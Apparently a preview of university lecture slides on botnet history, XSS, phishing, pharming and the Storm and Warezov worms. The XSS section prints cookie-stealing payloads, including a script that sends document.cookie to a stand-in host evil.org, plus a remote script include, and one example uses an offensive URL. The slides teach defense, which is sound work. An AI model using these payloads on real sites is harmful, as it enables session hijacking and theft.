XSS2008 - From Botnets to Cross Site Scripting Botnets...

Info iconThis preview shows pages 1–6. Sign up to view the full content.

View Full Document Right Arrow Icon

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
This is the end of the preview. Sign up to access the rest of the document.

Unformatted text preview: From Botnets to Cross Site Scripting Botnets monitoring Emergence of Bots GT bots combined mIRC client, hacking scripts & tools EggDrop, discovered, recognized as first IRC bot RPCSS 1993 1999 W32/PrettyPark 1st worm to use IRC as C&C 2000 2001 2002 W32/Agobot bot family added modular design and significant functionality 2003 W32/Sdbot First family of bots developed as a single binary 2004 2005 W32/Mytob hybrid bot, major e-mail outbreak 2006 Present W32/Spybot family emerged SpyBot worm • The Spybot worm is a large family of computer worms of varying characteristics. • Although the actual number of versions is unknown, it is estimated to be well into the thousands. • This briefly held the record for most variants, but has subsequently been surpassed by the Agobot family. • Spybot variants generally have several things in common: – The ability to spread via the popular P2P program KaZaA, often in addition to other such programs. – The ability to spread via at least vulnerability in the Microsoft Windows operating system. Earlier versions mostly used the RPC DCOM buffer overflow, although now some use the LSASS buffer overflow. – The ability to spread via various common backdoor Trojan horses. – The ability to spread to systems with weak administrative passwords. Large choice • For bot software, an attacker has numerous options,including Agobot, Phatbot, Forbot, XtremBot, SDBot, Rbot, URBot, or UrXBot, Perl-based bots • Whatever the choice, the software itself often leverages several different known vulnerabilities, infecting and spreading until it assembles a respectable bot force. • Each host that the bot software compromises becomes a node in a vast sleeper cell of machines awaiting an “attack” command. • Generally, the compromised machines’ authorized users have no idea their computers are subject to a third party’s control. • This is because a good bot spreads widely, quietly,and unobtrusively. Tracking botnets • • Nepenthes -- Collect samples of autonomous spreading malware, (war on errorism) http://nepenthes.mwcollect.org/ CW sandbox -- Automatically analyse a given sample, http://www.cwsandbox.org/ (Behavior-based Malware Analysis) • Botspy -- Observe a given botnet Lifetime of botnets • One botnet was active for more than 250 days • Approx. 15 - 20 new botnets every day • Approx. 130 botnets at the same time • Only about 50% are active for more than two days • Problem: Some botnets run on public IRC servers Cl Can the Law make a difference? The Botnet Economy • Because botnets are associated with substantial illegal revenue, a thriving underground economy has sprung up around botnet activity. • Rob Thomas of Team Cymru has written a comprehensive paper on this economy: “The Underground Economy - Priceless”. • http://www.usenix.org/publications/login/2006-12/openpdfs/cymru.pdf • Peter Gutmann of the University of Auckland has written another comprehensive paper: “The Commercial Malware Industry” on this subject, tracing the evolution of malware and botnets. • http://www.cs.auckland.ac.nz/~pgut001/pubs/malware_biz.pdf Botherders offer “service level agreements ”to clients • Guaranteed replacement of botnet in case anti-virus researchers release fix formal ware or botnet is taken down • Organized crime involved in all stages of ecosystem • Employ virus writers to create malware • Carry out spam campaigns, espionage, ID theft, cyber-attacks • Laundering of money stolen from victims The Botnet and the law Botnet Herder Pleads Guilty to Massive PayPal Scam • Virus Writers, Botherders, Clients – Virus writer writes malware, infects computersto create botnet – Botherder operates the botnet “command and control”(C&C) – Clients hire botnets to distribute spam, launch Distributed Denial of Service (DDoS) attacks to conduct identity theft • Highly developed underground channels of communication • “Secret ”forums/chatrooms that shift location • Access on a need to know basis, new entrants may need to be vouched for by existing participant Developing countries • The botnet problem (like the spam problem) is the same problem worldwide, but is particularly acute in emerging Internet economies, owing to resource scarcity and capacity issues. • Government, industry, and civil society in emerging Internet economies are often ill equipped to deal with the catastrophic effects of botnets. XSS XSS • The most popular CSS/XSS attack (and devastating) is the harvesting of authentication cookies and session management tokens. With this information, it is often a trivial exercise for an attacker to hijack the victims active session, completely bypassing the authentication process. • The mechanism of the attack is not difficult and can be automated. • Such scripts may be written in any number of scripting languages, provided that the client host can interpret the code. • Scripting tags that are most often used to embed malicious content include <SCRIPT>, <OBJECT>, <APPLET> and <EMBED>. • Attacks, Client-side scripting • Client-side scripting generally refers to the class of computer programs on the web that are executed client-side, by the user's web browser, instead of server-side (on the web server) • This type of computer programming is part of the Dynamic HTML (DHTML) concept, enabling web pages to have different and changing content depending on user input, or other variables. • Web authors write client-side scripts in languages such as JavaScript. • Client-side scripts are often embedded within an HTML document. JavaScript • JavaScript was influenced by many languages and was designed to have a similar look to Java, but be easier for non-programmers to work with. • The language is best known for its use in websites (as client-side JavaScript), but is also used to enable scripting access to objects embedded in other applications. • Despite the name, JavaScript is essentially unrelated to the Java programming language, though both have a common debt to C syntax, and JavaScript copies many Java names and naming conventions. XSS uses vulnerability • Java applets do not provide the attacker with any access beyond the Document Object Model (DOM) and are restricted to what is commonly referred to as a sandbox. • The most common web components that fall victim to CSS/XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. – Additionally, a victim doesn’t necessarily have to click on a link; CSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags. Example: • Vulnerable link looks like: http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script> • The victim, upon clicking the link, will generate a request to www.vulnerable.site, as follows: GET /welcome.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0 • • • • • • • • • Host: www.vulnerable.site ... And the vulnerable site response would be: <HTML> <Title>Welcome!</Title> Hi <script>alert(document.cookie)</script> <BR> Welcome to our system ... </HTML> HyperText Markup Language (HTML) • HTML, is the predominant markup language for web pages. • It provides a means to describe the structure of textbased information in a document — by denoting certain text as links, headings, paragraphs, lists, and so on — and to supplement that text with interactive forms, embedded images, and other objects. • HTML is written in the form of tags, surrounded by angle brackets. • HTML can include embedded scripting language code which can affect the behavior of web browsers and other HTML processors. HTML Tag • <SCRIPT> Adds a script that is to be used in the document. Attributes: – type = Specifies the language of the script. Its value must be a media type (e.g. text/javascript). This attribute is required by the HTML 4.0 specification and is a recommended replacement for the “language” attribute. – language = Identifies the language of the script, such as JavaScript or VBScript. – src = Specifies the URL of an outside file containing the script to be loaded and run with the document. (Netscape only) • Supported by: Netscape, IE 3+, HTML 4, Opera 3+ Hello World! <SCRIPT>malicious code</SCRIPT> <OBJECT> • Places an object (such as an applet, media file, etc.) on a document. The tag often contains information for retrieving ActiveX controls that IE uses to display the object. Attributes: – classid = Identifies the class identifier of the object. – codebase = Identifies the URL of the object’s codebase. – codetype = Specifies the media type of the code. Examples of code types include audio/basic, text/html, and image/gif. (IE and HTML 4.0 only) – data = Specifies the URL of the data used for the object. – name = Specifies the name of the object to be referenced by scripts on the page. – standby = Specifies the message to display while the object loads. – type = Specifies the media type for the data. – usemap = Specifies the imagemap URL to use with the object. • Supported by: Netscape, IE, HTML 4 <EMBED> • Embeds an object into the document. Embedded objects are most often multimedia files that require special plug-ins to display. Specific media types and their respective plug-ins may have additional proprietary attributes for controlling the playback of the file. The closing tag is not always required, but is recommended. The tag was dropped by the HTML 4.0 specification in favour of the <object> tag. Attributes: – – – – – – – – • hidden = Hides the media file or player from view when set to yes. name = Specifies the name for the embedded object for later reference within a script. pluginspage = Specifies the URL for information on installing the appropriate plug-in. src = Provides the URL to the file or object to be placed on the document. (Netscape 4+ and IE 4+ only) code = Specifies the class name of the Java code to be executed. (IE only) codebase = Specifies the base URL for the application. (IE only) pluginurl = Specifies a source for installing the appropriate plug-in for the media file. (Netscape only) type = Specifies the MIME type of the plug-in needed to run the file. (Netscape only) Supported by: Netscape, IE 3+, Opera 3+ Hello World! <EMBED SRC="http://www.paedophile.com/movies/rape.mov"> Summary of the attack • • • • • • The attacker investigates an interesting site that normal users must authenticate to gain access to, and that tracks the authenticated user through the use of cookies or session ID’s The attacker finds a CSS vulnerable page on the site, for instance http://trusted.org/ account.asp. Using a little social engineering, the attacker creates a special link to the site and embeds it in an HTML email that he sends to a long list of potential victims. Embedded within the special link are some coding elements specially designed to transmit a copy of the victims cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location .replace('http://evil.org/steal.cgi?'+document.cookie);</script>"> Unknown to the victim, the attacker has now received a copy of their cookie information. The attacker now visits the web site and, by substituting his cookie information with that of the victims, is now perceived to be the victim by the server application. Code Insertion P • security professions have discovered an ever increasing number of methods for potentially embedding code within poorly configured web applications. The following are some of the more common methods: • Inline Scripting – http://trusted.org/search.cgi?criteria=<script>code</script> – http://trusted.org/search.cgi?val=<SCRIPT SRC='http://evil.org/badkama.js'> </SCRIPT> – http://trusted.org/COM2.IMG%20src= "Javascript:alert(document.domain)" • Forced Error Responses – http://trusted.org/<script>code</script> This insertion facet usually occurs due to poor error handling by the web server or application component. The application fails to find the requested page and reports an error which unfortunately includes the unprocessed script data. • XSS is 95% percent avoidable with proper filtering techniques on any user supplied data. While making sure that every element is filtered in large (and especially legacy) web applications can be a daunting task, properly implemented filters can prevent your site from falling victim to the above mentioned attack scenarios. You can’t bank on security Next big problems? • New hacking technique exploits common programming error This is a bit of a Pandora's box and once we open it, it will be just the tip of the iceberg. Dangling pointers • Jonathan Afek and Adi Sharabani of Watchfire stumbled upon the method for remotely exploiting dangling pointers by chance while they were running the company's AppScan software against a Web server. – Dangling pointers are errors in software code that fail to refer to a valid object. Often the object that was referenced was deleted without changing the value of the pointer • Dangling pointers are quite common, but security experts and developers have said for years that there is no practical way to exploit them, so they've been considered quality-assurance problems and not security flaws. • But now that has changed. Similar to BO • • • • • "The common thought was that this kind of problem isn't exploitable. But we looked at this and thought, wouldn't it be neat if we could implement our own code on this server?" said Danny Allan, research director at Watchfire, based in Waltham, Mass. "The problem before was, you had to override the exact location that the pointer was pointing to. It was considered impossible. But we discovered a way to do this with generic dangling pointers and run our own shell code." "The long and short of it is, if you can determine the value of the pointer, it's game over." "The outcome is much like a buffer overflow. It's very severe," Allan said. "This is a bit of a Pandora's box and once we open it, it will be just the tip of the iceberg. “ Year of the Clever Rat perfect ways to steal data and commit fraud.: 1- One pioneering gang is taking over home network routers instead of PC hard drives, a sneakier way to hijack online accounts. 2- Another has perfected a way to use compromised PCs to repeatedly click on Internet ads to generate ad payments to the crooks 3-Phishing specialists are putting finer touches on scams to trick people into divulging sensitive personal data on fake Web pages. 4- Meanwhile, top-level crime rings are getting stealthier and more efficient at herding millions of compromised PCs, referred to as bots, into networks that they deploy to steal data, commit extortion and spread spam. Routers • One gang has begun sending out tainted email greeting cards that, when opened, give the intruders control of the recipient's router. – Targeting a router model popular in Mexico, these crooks have defrauded patrons of a large Mexican bank, (SYMC) • Copy cats now are the concern. "This attack technique can be generalized quite easily to go after multiple router brands and multiple banks," Click fraud. • This month, someone has tainted tens of thousands of mom-and-pop e-commerce sites, Landesman says. • Clicking to one of these sites can trigger ads selling fake anti-spyware or turn the visitor's PC into a hub for clicking on Web ads, while routing the ad payment to the intruder. Phishers. • Newly available at a French website: a turn-key phishing kit with everything needed to create bogus bank websites, including templates of official-looking bank letters requesting data. • In another current scam, an e-mail targets high-net-worth individuals with ruses keying off the arrival of tax season. Phishing • The first recorded mention of the term "phishing" is on the alt.online-service.America-online Usenet newsgroup on January 2, 1996,[4] although the term may have appeared earlier in the print edition of the hacker magazine 2600.[5] A phishing technique was described in detail as early as 1987, in a paper and presentation delivered to the International HP Users Group, Interex.[6] The term phishing is a variant of fishing,[7] probably influenced by phreaking,[8][9] and alludes to the use of increasingly sophisticated baits used in the hope of a "catch" of financial information and passwords. The word may also be linked to leetspeak, in which ph is a common substitution for f.[10] Photos to Fight Phishing? • In a bid to stave off phishing attacks, Bank of America is offering a new service that allows online customers to verify that they are indeed at the bank's official site by displaying an image that the customer supplies in advance. • The free service, called SiteKey and developed by Passmark Security of Redwood City, Calif., lets customers pick any image they have, then write a brief phrase and select three "challenge questions. – " When the customer next visits bankofamerica.com and enters a username, clicking on the SiteKey button displays their chosen image, embedded in the bank's site. – Customers are prompted to answer one of the challenge questions if they want to access their account from a different computer. Pharming • Pharming is a Hacker's attack aiming to redirect a website's traffic to another, bogus website. • Pharming can be conducted either by changing the hosts file on a victim’s computer or by exploitation of a vulnerability in DNS server software. • DNS servers are computers responsible for resolving Internet names into their real addresses — they are the "signposts" of the Internet. Compromised DNS servers are sometimes referred to as "poisoned". • Pharming has become of major concern to businesses hosting ecommerce and online banking websites. – Sophisticated measures known as anti-pharming are required to protect against this serious threat. – Antivirus software and spyware removal software cannot protect against pharming. • In recent years both pharming and phishing have been used to steal identity information. Zhelatin • Use of botnets for cybercrime has increased and become more refined since 2002-3 when mass mailer worms such as Sobig and Sober were released • 2007 generation botnets such as Zhelatin ( Storm Worm) are particularly aggressive using advanced techniques such as fast-flux networks to make it harder to shut down and even striking back with denial of service (DDOS) attacks against security researchers or vendors trying to mitigate the botnet • Gang (15M) Tactic The Internet battlefield • The end of 2006 was difficult for antivirus companies around the world. – Virus researchers around the world were in a state of high alert, mobilizing all their resources throughout the final quarter of the year. • This was caused by the unprecedented long and widespread attacks on the Internet caused by the unknown authors of the Warezov family of email worms. – The first examples of this worm appeared on the Internet in October 2006, and were most active towards the end of the month, when up to 20 new variants appeared in the space of 24 hours. – By the end of 2006 we had detected more than 400 variants of Warezov. In many ways, Warezov is extremely similar to the notorious Bagle. • Bagle was the first to use this virus technology in order to provide fresh material for spammers address databases - Warezov did exactly the same. • Although Warezov is based on Mydoom.a source code, and Bagle was a completely original program created by an unknown group of virus writers, we are inclined to view these two worms as being related. – Firstly, the way in which the epidemics were organized are extremely similar, with a large number of variants being mass mailed within a short period of time, which differ according to geographical region (e.g. the variants mailed in Russia differed to those mailed in Europe). – Secondly, their functionality - installing other worm modules from Trojanized sites and collecting email addresses which are then sent to a remote malicious user - is identical. Storm Worm =… • On 18th January 2007, hurricane Kyrill swept Europe. – The snowstorm took the lives of more than 30 people. Tens of thousands of Europeans were left without light, mobile connections or normal transport. – The world's attention was focused on the events which were covered by the mass media around the clock. • On 20th January, another storm hit, but this time the victim was email. The gigantic mass mailing contained messages with subjects like: – – – – – – – – • 230 dead as storm batters Europe. Russian missle shot down Chinese satellite Chinese missile shot down USA aircraft Sadam Hussein alive! Venezuelan leader: "Let's the War beginning". Fidel Castro dead. President of Russia Putin dead Third World War just have started! ..= Email-Worm.Win32.Zhelatin.a. • The attached files were actually a Trojan program, which got classified as TrojanDownload.Win32.Small.dam and TrojanDownloader.Win32.Small.bet. • This Trojan would download other components to the victim machine with the result being a new, extremely aggressive, network worm which utilized rootkit technologies. • Unofficially it was christened 'the Storm worm'. • The official name given to it in our antivirus databases was Email-Worm.Win32.Zhelatin.a. Cyberwar between gangs.. • War had been declared in cyberspace between the groups producing Warezov and Zhelatin. • Taking into account the size of the botnets used by both groups, and their clear aim to conduct a large number of attacks, the situations was clear: this was threatening to become one of the most serious problems on the Internet in recent years. Warezov versus Zhelatin • The authors of Warezov began responding to Zhelatin attacks in March, and Bagle started periodically putting its head above the ramparts several times a month from March onwards. • At the end of last year, antivirus companies were only having to combat attacks from a single groups, but now the complexity and volume of the task had increased three times. • And all of this was accompanied by an increase in spam and phishing. – Almost 32% of all malicious code in mail traffic in March 2007 was made up of Trojan-Spy.HTML.Bankfraud.ra. – This was clearly a result of the epidemics caused by Bagle, Zhelatin and Warezov. – This malicious program is a typical phishing email, and millions of copies were sent around the world. We also detected repeat sendings of this Trojan, which was initially detected on 27th February 2007. – The Trojan targets Branch Banking and Trust Company clients, luring them to fake sites which are registered by malicious users in Croatia and the Cocos (Keeling) Islands. (Vista) Sven Jaschan • Until now, the best known cyber conflict was that between Mydoom, Bagle and NetSky, back in spring 2004. • The Internet was flooded with dozens of variants of these worms: – they scanned victim machines for their competitors and took their place, deleting the original worm. • The war was brought to an end by the arrest of 18 year old Sven Jaschan, the author of NetSky, in Germany. • However, his creations remain one of the most widespread worms in mail traffic. Sven Jaschan ...
View Full Document

This note was uploaded on 05/12/2008 for the course EPP 19601 taught by Professor Morel during the Spring '08 term at Carnegie Mellon.

Page1 / 50

XSS2008 - From Botnets to Cross Site Scripting Botnets...

This preview shows document pages 1 - 6. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online